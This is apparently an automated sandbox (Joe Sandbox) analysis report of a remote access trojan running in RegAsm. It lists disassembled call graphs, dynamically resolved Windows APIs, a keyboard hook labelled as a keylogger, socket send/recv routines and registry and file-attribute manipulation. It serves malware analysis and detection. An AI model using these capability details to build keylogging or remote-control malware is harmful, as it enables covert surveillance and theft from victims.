SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48614->48643 48616 41bb77 GetTickCount 48616->48635 48617->48614 48619 40b927 28 API calls 48619->48635 48620 40af17 48621 401f09 11 API calls 48620->48621 48621->48608 48622 40ae84 Sleep 48622->48635 48625 402093 28 API calls 48625->48635 48627 409097 28 API calls 48627->48635 48629 406383 28 API calls 48629->48635 48631 403014 28 API calls 48631->48635 48632 40a671 12 API calls 48632->48635 48633 41bcef 28 API calls 48633->48635 48634 401f09 11 API calls 48634->48635 48635->48614 48635->48616 48635->48619 48635->48620 48635->48622 48635->48625 48635->48627 48635->48629 48635->48631 48635->48632 48635->48633 48635->48634 48636 401fd8 11 API calls 48635->48636 48644 40907f 28 API calls 48635->48644 48645 40b19f 31 API calls _Yarn 48635->48645 48646 40b9b7 28 API calls 48635->48646 48647 40b783 40 API calls 2 library calls 48635->48647 48648 441ed1 20 API calls 48635->48648 48649 4052fd 28 API calls 48635->48649 48636->48635 48639 401f8e 48638->48639 48640 402252 11 API calls 48639->48640 48641 401f99 48640->48641 48641->48614 48642->48614 48643->48614 48644->48635 48645->48635 48646->48635 48647->48635 48648->48635 48651 40a776 Sleep 48650->48651 48671 40a6b0 48651->48671 48653 40a2c1 48654 40a7b6 CreateDirectoryW 48659 40a788 48654->48659 48655 40a7c7 GetFileAttributesW 48655->48659 48656 401e65 22 API calls 48656->48659 48657 40a7de SetFileAttributesW 48657->48659 48659->48651 48659->48653 48659->48655 48659->48656 48659->48657 48662 40a7aa 48659->48662 48684 41c482 48659->48684 48660 40a858 PathFileExistsW 48660->48662 48661 4020df 11 API calls 48661->48662 48662->48654 48662->48660 48662->48661 48664 4020b7 28 API calls 48662->48664 48665 40a961 SetFileAttributesW 48662->48665 48666 401fd8 11 API calls 48662->48666 48667 406e13 28 API calls 48662->48667 48668 401fe2 28 API calls 48662->48668 48670 401fd8 11 API calls 48662->48670 48694 41c516 32 API calls 48662->48694 48695 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48662->48695 48664->48662 48665->48659 48666->48662 48667->48662 48668->48662 48670->48659 48672 40a75d 48671->48672 48674 40a6c6 48671->48674 48672->48659 48673 40a6e5 CreateFileW 48673->48674 48675 40a6f3 GetFileSize 48673->48675 48674->48673 48676 40a728 CloseHandle 48674->48676 48677 40a73a 48674->48677 48678 40a716 48674->48678 48679 40a71d Sleep 48674->48679 48675->48674 48675->48676 48676->48674 48677->48672 48681 409097 28 API calls 48677->48681 48696 40b117 84 API calls 48678->48696 48679->48676 48682 40a756 48681->48682 48683 40a1b4 124 API calls 48682->48683 48683->48672 48685 41c495 CreateFileW 48684->48685 48687 41c4d2 48685->48687 48688 41c4ce 48685->48688 48689 41c4f2 WriteFile 48687->48689 48690 41c4d9 SetFilePointer 48687->48690 48688->48659 48692 41c505 48689->48692 48693 41c507 CloseHandle 48689->48693 48690->48689 48691 41c4e9 CloseHandle 48690->48691 48691->48688 48692->48693 48693->48688 48694->48662 48695->48662 48696->48679 48698 40a30c GetModuleHandleA SetWindowsHookExA 48697->48698 48699 40a36e GetMessageA 48697->48699 48698->48699 48701 40a328 GetLastError 48698->48701 48700 40a380 TranslateMessage DispatchMessageA 48699->48700 48702 40a2ab 48699->48702 48700->48699 48700->48702 48712 41bc1f 28 API calls 48701->48712 48704 40a339 48713 4052fd 28 API calls 48704->48713 48712->48704 48716 40322e 48715->48716 48725 403618 48716->48725 48718 40323b 48718->48548 48720 40326e 48719->48720 48721 402252 11 API calls 48720->48721 48722 403288 48721->48722 48723 402336 11 API calls 48722->48723 48724 403031 48723->48724 48724->48108 48726 403626 48725->48726 48727 403644 48726->48727 48728 40362c 48726->48728 48730 40365c 48727->48730 48731 40369e 48727->48731 48736 4036a6 28 API calls 48728->48736 48734 4027e6 28 API calls 48730->48734 48735 403642 48730->48735 48737 4028a4 22 API calls 48731->48737 48734->48735 48735->48718 48736->48735 48739 404186 48738->48739 48740 402252 11 API calls 48739->48740 48741 404191 48740->48741 48749 4041bc 48741->48749 48744 4042fc 48760 404353 48744->48760 48746 40430a 48747 403262 11 API calls 48746->48747 48748 404319 48747->48748 48748->48117 48750 4041c8 48749->48750 48753 4041d9 48750->48753 48752 40419c 48752->48744 48754 4041e9 48753->48754 48755 404206 48754->48755 48756 4041ef 48754->48756 48757 4027e6 28 API calls 48755->48757 48758 404267 28 API calls 48756->48758 48759 404204 48757->48759 48758->48759 48759->48752 48761 40435f 48760->48761 48764 404371 48761->48764 48763 40436d 48763->48746 48765 40437f 48764->48765 48766 404385 48765->48766 48767 40439e 48765->48767 48830 4034e6 28 API calls 48766->48830 48768 402888 22 API calls 48767->48768 48769 4043a6 48768->48769 48771 404419 48769->48771 48772 4043bf 48769->48772 48831 4028a4 22 API calls 48771->48831 48775 4027e6 28 API calls 48772->48775 48783 40439c 48772->48783 48775->48783 48783->48763 48830->48783 48838 43ab1a 48832->48838 48836 4138f4 48835->48836 48837 4138ca RegSetValueExA RegCloseKey 48835->48837 48836->48133 48837->48836 48841 43aa9b 48838->48841 48840 40170d 48840->48135 48842 43aaaa 48841->48842 48843 43aabe 48841->48843 48854 44062d 20 API calls _abort 48842->48854 48845 43aaaf pre_c_initialization __alldvrm 48843->48845 48847 4489d7 48843->48847 48845->48840 48848 44854a _abort 5 API calls 48847->48848 48849 4489fe 48848->48849 48850 448a16 GetSystemTimeAsFileTime 48849->48850 48851 448a0a 48849->48851 48850->48851 48852 43502b ___crtLCMapStringA 5 API calls 48851->48852 48853 448a27 48852->48853 48853->48845 48854->48845 48856 41b98a _Yarn ___scrt_get_show_window_mode 48855->48856 48857 402093 28 API calls 48856->48857 48858 414f84 48857->48858 48858->48142 48859->48159 48861 414f33 48860->48861 48862 414f3d getaddrinfo WSASetLastError 48860->48862 48987 414dc1 48861->48987 48862->48188 48866 4020df 11 API calls 48865->48866 48867 41cb86 FormatMessageA 48866->48867 48868 41cba4 48867->48868 48870 41cbb2 48867->48870 48869 402093 28 API calls 48868->48869 48871 41cbb0 48869->48871 48872 41cbbd LocalFree 48870->48872 48874 401fd8 11 API calls 48871->48874 48873 402055 11 API calls 48872->48873 48873->48871 48875 41cbd9 48874->48875 48875->48188 48877 404846 socket 48876->48877 48878 404839 48876->48878 48880 404860 CreateEventW 48877->48880 48881 404842 48877->48881 49026 40489e WSAStartup 48878->49026 48880->48188 48881->48188 48882 40483e 48882->48877 48882->48881 48884 404f65 48883->48884 48885 404fea 48883->48885 48886 404f6e 48884->48886 48887 404fc0 CreateEventA CreateThread 48884->48887 48888 404f7d GetLocalTime 48884->48888 48885->48188 48886->48887 48887->48885 49029 405150 48887->49029 49027 41bc1f 28 API calls 48888->49027 48890 404f91 49028 4052fd 28 API calls 48890->49028 48899 404a1b 48898->48899 48900 4048ee 48898->48900 48901 40497e 48899->48901 48902 404a21 WSAGetLastError 48899->48902 48900->48901 48903 404923 48900->48903 48905 40531e 28 API calls 48900->48905 48901->48188 48902->48901 48904 404a31 48902->48904 49033 420cf1 27 API calls 48903->49033 48906 404932 48904->48906 48907 404a36 48904->48907 48910 40490f 48905->48910 48913 402093 28 API calls 48906->48913 48911 41cb72 30 API calls 48907->48911 48909 40492b 48909->48906 48912 404941 48909->48912 48914 402093 28 API calls 48910->48914 48915 404a40 48911->48915 48922 404950 48912->48922 48923 404987 48912->48923 48916 404a80 48913->48916 48917 40491e 48914->48917 49044 4052fd 28 API calls 48915->49044 48919 402093 28 API calls 48916->48919 48920 41b580 80 API calls 48917->48920 48924 404a8f 48919->48924 48920->48903 48928 402093 28 API calls 48922->48928 49041 421ad1 54 API calls 48923->49041 48929 41b580 80 API calls 48924->48929 48932 40495f 48928->48932 48929->48901 48930 40498f 48933 4049c4 48930->48933 48934 404994 48930->48934 48936 402093 28 API calls 48932->48936 49043 420e97 28 API calls 48933->49043 48937 402093 28 API calls 48934->48937 48939 40496e 48936->48939 48941 4049a3 48937->48941 48942 41b580 80 API calls 48939->48942 48944 402093 28 API calls 48941->48944 48945 404973 48942->48945 48943 4049cc 48946 4049f9 CreateEventW CreateEventW 48943->48946 48948 402093 28 API calls 48943->48948 48947 4049b2 48944->48947 49034 420d31 48945->49034 48946->48901 48950 41b580 80 API calls 48947->48950 48949 4049e2 48948->48949 48952 402093 28 API calls 48949->48952 48953 4049b7 48950->48953 48954 4049f1 48952->48954 49042 421143 52 API calls 48953->49042 48956 41b580 80 API calls 48954->48956 48957 4049f6 48956->48957 48957->48946 48959 404e40 SetEvent CloseHandle 48958->48959 48960 404e57 closesocket 48958->48960 48961 404ed8 48959->48961 48962 404e64 48960->48962 48961->48188 48963 404e73 48962->48963 48964 404e7a 48962->48964 49047 4050e4 84 API calls 48963->49047 48966 404e8c WaitForSingleObject 48964->48966 48967 404ece SetEvent CloseHandle 48964->48967 48968 420d31 3 API calls 48966->48968 48967->48961 48969 404e9b SetEvent WaitForSingleObject 48968->48969 48970 420d31 3 API calls 48969->48970 48971 404eb3 SetEvent CloseHandle CloseHandle 48970->48971 48971->48967 48972->48188 48974->48188 48975->48188 48976->48188 48977->48206 48978->48206 48979->48206 48980->48206 48981->48206 48982->48206 48983->48206 48984->48206 48985->48206 48986->48206 48988 414e03 GetSystemDirectoryA 48987->48988 49004 414f0a 48987->49004 48989 414e1e 48988->48989 48988->49004 49008 441a8e 48989->49008 48991 414e3a 49015 441ae8 48991->49015 48993 414e4a LoadLibraryA 48994 414e7d 48993->48994 48995 414e6c GetProcAddress 48993->48995 48997 441a8e ___std_exception_copy 20 API calls 48994->48997 49001 414ece 48994->49001 48995->48994 48996 414e78 FreeLibrary 48995->48996 48996->48994 48998 414e99 48997->48998 48999 441ae8 20 API calls 48998->48999 49003 414ea9 LoadLibraryA 48999->49003 49000 414ed4 GetProcAddress 49000->49001 49002 414eef FreeLibrary 49000->49002 49001->49000 49001->49004 49006 414eed 49001->49006 49002->49006 49003->49004 49005 414ebd GetProcAddress 49003->49005 49004->48862 49005->49001 49007 414ec9 FreeLibrary 49005->49007 49006->49004 49006->49006 49007->49001 49009 441aa9 49008->49009 49010 441a9b 49008->49010 49022 44062d 20 API calls _abort 49009->49022 49010->49009 49013 441ac0 49010->49013 49012 441ab1 pre_c_initialization 49012->48991 49013->49012 49023 44062d 20 API calls _abort 49013->49023 49016 441b04 49015->49016 49018 441af6 49015->49018 49024 44062d 20 API calls _abort 49016->49024 49018->49016 49019 441b2d 49018->49019 49021 441b0c pre_c_initialization 49019->49021 49025 44062d 20 API calls _abort 49019->49025 49021->48993 49022->49012 49023->49012 49024->49021 49025->49021 49026->48882 49027->48890 49032 40515c 102 API calls 49029->49032 49031 405159 49032->49031 49033->48909 49035 41e7a2 49034->49035 49036 420d39 49034->49036 49037 41e7b0 49035->49037 49045 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 49035->49045 49036->48901 49046 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 49037->49046 49040 41e7b7 49041->48930 49042->48945 49043->48943 49045->49037 49046->49040 49047->48964 49049->48254 49050->48281 49051->48280 49052->48269 49053->48273 49054->48279 49055->48308 49060 40f7fd 49058->49060 49059 413584 3 API calls 49059->49060 49060->49059 49061 40f8a1 49060->49061 49063 40f891 Sleep 49060->49063 49080 40f82f 49060->49080 49064 409097 28 API calls 49061->49064 49062 409097 28 API calls 49062->49080 49063->49060 49067 40f8ac 49064->49067 49066 41bcef 28 API calls 49066->49080 49068 41bcef 28 API calls 49067->49068 49069 40f8b8 49068->49069 49093 41384f 14 API calls 49069->49093 49072 401f09 11 API calls 49072->49080 49073 40f8cb 49074 401f09 11 API calls 49073->49074 49076 40f8d7 49074->49076 49075 402093 28 API calls 49075->49080 49077 402093 28 API calls 49076->49077 49078 40f8e8 49077->49078 49081 4137aa 14 API calls 49078->49081 49079 4137aa 14 API calls 49079->49080 49080->49062 49080->49063 49080->49066 49080->49072 49080->49075 49080->49079 49091 40d0d1 112 API calls ___scrt_get_show_window_mode 49080->49091 49092 41384f 14 API calls 49080->49092 49082 40f8fb 49081->49082 49094 41288b TerminateProcess WaitForSingleObject 49082->49094 49084 40f903 ExitProcess 49095 412829 62 API calls 49085->49095 49092->49080 49093->49073 49094->49084 49096 4458c8 49098 4458d3 49096->49098 49099 4458fc 49098->49099 49100 4458f8 49098->49100 49102 448b04 49098->49102 49109 445920 DeleteCriticalSection 49099->49109 49103 44854a _abort 5 API calls 49102->49103 49104 448b2b 49103->49104 49105 448b49 InitializeCriticalSectionAndSpinCount 49104->49105 49106 448b34 49104->49106 49105->49106 49107 43502b ___crtLCMapStringA 5 API calls 49106->49107 49108 448b60 49107->49108 49108->49098 49109->49100 49110 40165e 49111 401666 49110->49111 49112 401669 49110->49112 49113 4016a8 49112->49113 49115 401696 49112->49115 49114 43455e new 22 API calls 49113->49114 49116 40169c 49114->49116 49117 43455e new 22 API calls 49115->49117 49117->49116 49118 426cdc 49123 426d59 send 49118->49123 49124 41e04e 49125 41e063 _Yarn ___scrt_get_show_window_mode 49124->49125 49137 41e266 49125->49137 49143 432f55 21 API calls _Yarn 49125->49143 49128 41e277 49131 41e21a 49128->49131 49139 432f55 21 API calls _Yarn 49128->49139 49130 41e213 ___scrt_get_show_window_mode 49130->49131 49144 432f55 21 API calls _Yarn 49130->49144 49133 41e2b0 ___scrt_get_show_window_mode 49133->49131 49140 4335db 49133->49140 49135 41e240 ___scrt_get_show_window_mode 49135->49131 49145 432f55 21 API calls _Yarn 49135->49145 49137->49131 49138 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49137->49138 49138->49128 49139->49133 49146 4334fa 49140->49146 49142 4335e3 49142->49131 49143->49130 49144->49135 49145->49137 49147 433509 49146->49147 49148 433513 49146->49148 49147->49142 49148->49147 49152 432f55 21 API calls _Yarn 49148->49152 49150 433534 49150->49147 49153 4338c8 CryptAcquireContextA 49150->49153 49152->49150 49154 4338e9 CryptGenRandom 49153->49154 49155 4338e4 49153->49155 49154->49155 49156 4338fe CryptReleaseContext 49154->49156 49155->49147 49156->49155 49157 426c6d 49163 426d42 recv 49157->49163

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                        • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                        • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                        • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                        • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                        • API String ID: 4236061018-3687161714
                                                                                                        • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                        • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                        • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                        • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1305 40a2f3-40a30a 1306 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1305->1306 1307 40a36e-40a37e GetMessageA 1305->1307 1306->1307 1310 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1306->1310 1308 40a380-40a398 TranslateMessage DispatchMessageA 1307->1308 1309 40a39a 1307->1309 1308->1307 1308->1309 1311 40a39c-40a3a1 1309->1311 1310->1311
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                        • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                        • GetLastError.KERNEL32 ref: 0040A328
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        • GetMessageA.USER32 ref: 0040A376
                                                                                                        • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                        • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                        Strings
                                                                                                        • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                        • String ID: Keylogger initialization failure: error
                                                                                                        • API String ID: 3219506041-952744263
                                                                                                        • Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                                                                        • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                        • Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                                                                        • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                          • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                          • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                        • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                        • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                                        • API String ID: 2281282204-1392497409
                                                                                                        • Opcode ID: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                                        • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                        • Opcode Fuzzy Hash: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                                        • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,008A5A58), ref: 004338DA
                                                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1815803762-0
                                                                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                        • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                        • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                        APIs
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                        Strings
                                                                                                        • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Time$FileSystem
                                                                                                        • String ID: GetSystemTimePreciseAsFileTime
                                                                                                        • API String ID: 2086374402-595813830
                                                                                                        • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                        • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                        • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                        • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: NameUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2645101109-0
                                                                                                        • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                        • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                        • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                        • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: recv
                                                                                                        • String ID:
                                                                                                        • API String ID: 1507349165-0
                                                                                                        • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                        • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                        • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                        • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                        APIs
